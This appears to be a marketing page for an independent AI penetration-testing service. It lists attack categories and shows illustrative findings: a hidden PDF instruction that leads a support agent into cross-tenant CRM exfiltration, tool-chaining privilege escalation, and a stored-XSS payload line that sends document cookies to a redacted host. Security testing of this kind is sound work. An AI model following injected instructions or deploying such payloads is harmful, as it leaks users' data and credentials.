Independent AI Pentest

Adversarial testing for the AI in your product.

Manual pentest engagements against the chatbot, agent, or copilot you're shipping. The deliverable is a written report your customer's security team — or your SOC 2 auditor — will accept.

Start a scoping conversation · See what we test

[Illustrative live probe. Target: customer-support-bot · gpt-4o w/ tools. Attacker and model turns. Scenario 01 / 03: system prompt extracted.]

Who it's for

Built for AI product startups whose buyers are starting to ask security questions.

If any of these describe your week, the deliverable from a Ferrok engagement is the document that closes the loop.

Signal 01

A prospect's procurement or security team sent a questionnaire that called out your AI feature specifically — and you don't have a clean answer for the prompt-injection question.

Signal 02

Your SOC 2 auditor flagged the LLM call as out of scope for the existing controls and asked you to demonstrate something. You need a third-party artifact, not another internal review.

Signal 03

You're about to launch an agent or tool-using AI feature with broader permissions than your existing surface, and you want a defensible adversarial review before it goes live.

Scope of work

What gets tested.

Every engagement covers the prompt and tool layer of your AI system. The exact attack surface is scoped in the intake call — what's listed below is the standard menu.

Prompt injection

Direct and indirect injection across every untrusted input your model sees — user messages, retrieved documents, tool outputs, third-party content. Includes the harder cases: payload smuggling, multi-turn, encoded, and out-of-band injection.

Jailbreaks & policy bypass

Adversarial attempts to push the model past its safety guidelines, system prompt, or operator-defined refusals — using technique families that survive vendor patches, not the hot jailbreak of the week.

Data leakage

Extraction of system prompts, retrieval indexes, training data, other users' history, embedded credentials, and PII that wasn't supposed to leave the boundary — via the model and via the surrounding plumbing.

Tool & agent abuse

Coercing the model into invoking tools it shouldn't, with arguments it shouldn't construct, against targets it shouldn't reach. Privilege escalation across multi-step agent loops, function-calling boundaries, and MCP-style tool servers.

Output handling

Where model output flows into a browser, a shell, a database query, an HTTP client, or another model — and what an adversary can do with that. XSS via assistant rendering, SSRF via agent fetches, prompt-to-SQL, prompt-to-RCE.

Prompt-layer supply chain

The system prompt, the retrieval corpus, the function specs, the third-party tools your agent loads — all attack surface you don't usually think about. We cover what an attacker would target if they couldn't reach the model directly.

Anatomy of a finding

What lands in your report.

Each finding ships with severity, technique, reproducible evidence, business impact, and remediation guidance — in language your engineering team can act on and your customer's security team can read.
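As a rough illustration of the fields listed above, a finding could be modelled as a small record. This is a minimal sketch, not the actual report schema: the class name, field names, and the example ID `FRK-0000` are all hypothetical, and the severity levels are only the three that appear in the illustrative findings on this page.

```python
from dataclasses import dataclass, field
from enum import Enum


class Severity(Enum):
    # Only the levels shown in the illustrative findings; a real scale may differ.
    CRITICAL = "Critical"
    HIGH = "High"
    MEDIUM = "Medium"


@dataclass
class Finding:
    """Hypothetical record mirroring the parts of a finding named in the text."""
    finding_id: str
    severity: Severity
    technique: str
    title: str
    evidence: list = field(default_factory=list)  # reproducible request/response lines
    business_impact: str = ""
    remediation: str = ""
    reproduced: bool = False


# Placeholder values for illustration only, not real client data.
example = Finding(
    finding_id="FRK-0000",
    severity=Severity.HIGH,
    technique="Tool & agent abuse",
    title="Example finding title",
    evidence=["turn 1 > tool=example.tool ok"],
    business_impact="Describes what an attacker gains.",
    remediation="Describes the fix the engineering team can apply.",
    reproduced=True,
)
```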

// Illustrative finding types — not real client data

FRK-0142 Critical

Prompt injection · indirect

Customer-uploaded PDF coerces support agent into CRM exfiltration.

A hidden instruction block inside a user-uploaded PDF was followed by the assistant on the next turn, invoking the crm.lookup_contact tool against records belonging to other tenants.

payload > 
resp > {"contacts":[{"email":"REDACTED"}...]}

Reproduced · Triage: scope & sanitization
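One common mitigation for this class of finding is to take the tenant from the authenticated session rather than from anything the model supplies. The sketch below assumes a hypothetical in-memory contact store and a hypothetical `Session` type; only the tool name `crm.lookup_contact` comes from the finding above, and its real signature is unknown.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Session:
    """Hypothetical server-side session; never populated from model output."""
    user_id: str
    tenant_id: str


# Hypothetical stand-in for the CRM backing store.
CONTACTS = [
    {"id": "c1", "tenant_id": "tenant-a", "email": "a@example.com"},
    {"id": "c2", "tenant_id": "tenant-b", "email": "b@example.com"},
]


def lookup_contact(session: Session, contact_id: str) -> Optional[dict]:
    """Sketch of a crm.lookup_contact handler scoped to the caller's tenant.

    The model may choose contact_id, but the tenant filter is applied
    from the session, so an injected instruction cannot widen the scope.
    """
    for contact in CONTACTS:
        if contact["id"] == contact_id and contact["tenant_id"] == session.tenant_id:
            return contact
    return None
```

With this shape, an instruction hidden in an uploaded document can still trigger the tool call, but a lookup for another tenant's record returns nothing.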

FRK-0157 High

Tool & agent abuse

Free-tier user induces agent to chain two permitted tools into an admin action.

Two operations individually allowed by the policy, when called in sequence, returned tenant-scoped audit logs through a tool the user's plan should not have reached.

turn 3 > tool=workspace.list_members ok
turn 5 > tool=audit.export_range scope=REDACTED ok (should require role=admin)

Reproduced · Triage: policy boundary
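A policy-boundary fix for a finding like this usually means checking authorization on every tool call at dispatch time, independent of what earlier turns returned. The sketch below is one way to express that, under stated assumptions: the role names, the `REQUIRED_ROLE` table, and the `dispatch_tool` function are hypothetical; only the two tool names come from the evidence above.

```python
# Hypothetical mapping from tool name to the minimum role allowed to call it.
REQUIRED_ROLE = {
    "workspace.list_members": "member",
    "audit.export_range": "admin",
}

# Hypothetical role ordering: higher rank includes lower-rank permissions.
ROLE_RANK = {"member": 0, "admin": 1}


def dispatch_tool(tool_name, caller_role, handlers, **kwargs):
    """Run a tool only if the caller's role meets the tool's requirement.

    The check runs on every call, so chaining permitted tools cannot
    reach a tool the caller is not entitled to.
    """
    required = REQUIRED_ROLE.get(tool_name)
    if required is None:
        # Deny by default: tools missing from the table are not callable.
        raise PermissionError(f"tool not registered: {tool_name}")
    if ROLE_RANK.get(caller_role, -1) < ROLE_RANK[required]:
        raise PermissionError(f"{tool_name} requires role={required}")
    return handlers[tool_name](**kwargs)
```

The role is passed in by the application from the authenticated user, not inferred from the conversation, which is the design choice that keeps the boundary out of the model's hands.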

FRK-0163 Medium

Output handling

Stored XSS via assistant markdown renderer in shared thread view.

Adversarial assistant output rendered as an active <img onerror> in the conversation history pane; persists for any user later viewing the thread.

render> <img src=x onerror="fetch('//REDACTED'+document.cookie)">
scope > persists across sessions, all viewers

Reproduced · Triage: output sanitization
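The simplest form of output sanitization is to treat assistant text as untrusted and escape it before it reaches the page. The sketch below uses Python's standard `html.escape`; the function name `render_assistant_text` is hypothetical, and a product that renders markdown would more likely need an allowlist-based HTML sanitizer applied to the renderer's output, which this example does not attempt.

```python
import html


def render_assistant_text(raw: str) -> str:
    """Escape assistant output so the browser displays markup as text."""
    # quote=True also escapes double and single quotes, which matters
    # if the result is ever placed inside an HTML attribute.
    return html.escape(raw, quote=True)


# A payload shaped like the one in the finding, with a harmless handler.
payload = '<img src=x onerror="alert(1)">'
safe = render_assistant_text(payload)
```

After escaping, the string contains no literal `<` or `>` characters, so it shows up in the thread view as visible text instead of an active element.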

Read a full illustrative engagement report — six findings deep, with OWASP LLM Top 10 mapping and a remediation priority matrix.

Download sample report (PDF) →

Engagement process

How an engagement runs.

Most engagements start with a 30-minute scoping call and ship a written report two to four weeks later. No deliverable is generated by an LLM — the report is hand-written from the test artifacts.

Engagements are fixed-fee and scoped per feature: we agree on the fee during the scoping call, sized to the attack surface and the depth of testing you need. No surprises after the SOW.

01

Scoping call

30 minutes. We map the AI feature's attack surface, agree what's in and out of scope, and decide whether to run against a staging instance, a sandboxed account, or production behind a feature flag.

~30 min

02

Statement of work

Written SOW with explicit scope, target environments, attack categories, deliverable format, timeline, and a fixed engagement fee. Mutual NDA up front. You sign before we start.

~2 days

03

Manual testing

Hands-on adversarial testing across the agreed scope. Critical findings are reported as we discover them — you don't wait for the report to start patching. All test artifacts are preserved for the writeup.

1–3 weeks

04

Written report

Findings with severity, reproduction steps, evidence, and remediation guidance. Executive summary suitable for handing to a customer's security team or a SOC 2 auditor. One round of remediation re-testing included.

~1 week

About Ferrok

Independent. Hands-on. Written for the people who'll read the report.

Ferrok runs manual pentest engagements against the AI features inside product companies — the chatbots, copilots, and agentic workflows that customers and procurement teams are starting to ask hard security questions about.

Engagements are run personally. There is no junior consultant, no offshore team, no red-team-as-a-service platform between you and the work. The report is written by the person who did the testing — in language your engineering team can act on and your customer's security team can read.

Get in touch

Start a scoping conversation.

Tell me what you're shipping and what's prompting the security review. I'll get back to you within one business day to set up a 30-minute scoping call. Pricing is scoped per engagement — the call is free.

Thanks — got it.

I'll reply within one business day from r2founds@gmail.com to set up the scoping call. If you don't see it in 24 hours, check spam or email me directly.

No newsletter, no marketing list. Your details are used only to scope this engagement.